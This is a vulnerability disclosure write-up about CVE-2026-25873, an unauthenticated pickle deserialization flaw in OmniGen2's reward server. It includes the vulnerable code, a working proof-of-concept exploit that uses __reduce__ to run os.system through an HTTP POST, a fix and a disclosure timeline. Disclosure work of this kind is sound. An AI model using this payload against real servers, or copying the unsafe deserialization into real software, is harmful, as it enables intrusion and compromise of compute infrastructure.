OmniGen2: Unauthenticated RCE via Pickle Deserialization in BAAI's Reward Server
Table of Contents
Introduction
While doing a systematic audit of pickle deserialization patterns across popular ML/AI projects on GitHub, I found a critical vulnerability in OmniGen2, a multimodal AI project by BAAI (Beijing Academy of Artificial Intelligence) with 4,000+ stars.
The reward server component, used during reinforcement learning training, calls pickle.loads() directly on HTTP POST bodies without any form of authentication. This gives unauthenticated Remote Code Execution to anyone who can reach the server port - which binds to 0.0.0.0 by default.
Target: VectorSpaceLab/OmniGen2 Stars: 4,000+ CVE: CVE-2026-25873 Severity: Critical (CVSS 4.0: 9.3)
What is OmniGen2?
OmniGen2 is an open-source multimodal generation model developed by BAAI. It handles text-to-image generation, image editing, and visual understanding. The project includes an RL (Reinforcement Learning) training component called OmniGen2-RL, which uses a distributed reward server architecture to score generated outputs during training.
The reward server infrastructure consists of a proxy server (reward_proxy.py, port 23456) that distributes work to multiple backend workers (reward_server.py, ports 18888+). Both communicate via HTTP with pickle-serialized payloads.
The Vulnerability
The pattern is dead simple. In reward_proxy.py, line 208:
def prepare_request_data(request_body):
data = pickle.loads(request_body) # untrusted network input
This function is called from the Flask POST / endpoint at line 224:
@app.route("/", methods=["POST"])
def evaluate():
...
data = prepare_request_data(request.data)
The same pattern exists in reward_server.py at line 118:
def parse_and_validate_request(raw_data):
data = pickle.loads(raw_data) # same thing
That’s it. Raw bytes from the network, straight into pickle.loads(). No authentication, no validation, no restricted unpickler. The server binds to 0.0.0.0 by default, making it accessible from any network interface.
Python’s pickle module executes arbitrary code during deserialization via the __reduce__ protocol - an attacker sends a crafted object, and pickle.loads() runs whatever function that object specifies before any other processing happens.
Proof of Concept
Setting Up the Target
I tested this against the real reward_proxy.py code from the repository, deployed in Docker exactly as the project documents it:
# Docker with real reward_proxy.py and real editscore_7B.yml config
docker run -d --name omnigen2-lab -p 23456:23456 omnigen2-lab
The server starts with:
python reward_proxy.py --config_path server_configs/editscore_7B.yml
The Exploit
import pickle
import os
import requests
class RCE:
def __init__(self, cmd):
self.cmd = cmd
def __reduce__(self):
return (os.system, (self.cmd,))
requests.post('http://target:23456/', data=pickle.dumps(RCE('id > /tmp/pwned')))
Result
$ docker exec omnigen2-lab cat /tmp/pwned
uid=0(root) gid=0(root) groups=0(root) # <-- root!
The server returns HTTP 400 - that’s expected. The pickle.loads() call executes the malicious payload, then the server tries to access dict keys on the result (which is an int from os.system()), fails, and returns an error. But the RCE already happened before the validation.
Both the proxy server (port 23456) and the worker servers (ports 18888+) are vulnerable through the same pattern.
Attack Surface
The deployment architecture makes this particularly concerning:
- The proxy binds to
0.0.0.0:23456by default - Worker servers bind to
0.0.0.0:18888(and sequential ports) - The deployment scripts (
start_multi_machines.sh) use SSH to start servers across multiple hosts, confirming these are meant to be network-accessible - No firewall rules, TLS, or authentication tokens are referenced anywhere in the codebase
- These servers run on GPU nodes, so compromise gives access to expensive compute infrastructure
There’s also a client-side vector: reward_client_edit.py calls pickle.loads(response.content) on server responses, meaning a compromised server could RCE the training clients too.
Suggested Fix
The reward server serializes scores, image paths, and training configs - all representable as JSON. Replace pickle.loads() with json.loads() and add a shared secret in an Authorization header.
Timeline
- 2026-02-10: Vulnerability discovered and confirmed via Docker PoC
- 2026-02-10: Disclosure email sent to vendor (project leads via arxiv paper contacts)
- 2026-02-10: CVE request submitted to VulnCheck
- 2026-02-11: CVE-2026-25873 assigned by VulnCheck
- 2026-03-18: No response from maintainers. Fix PR submitted: #139
- 2026-03-18: CVE published, write-up disclosed
Takeaways
OmniGen2 is the most straightforward case in this series - HTTP POST body straight into pickle.loads(), running as root in Docker, on a multi-machine deployment with SSH-based orchestration. The client-side vector (deserializing server responses) adds a bidirectional risk: compromise the server, and you compromise every training client that connects to it.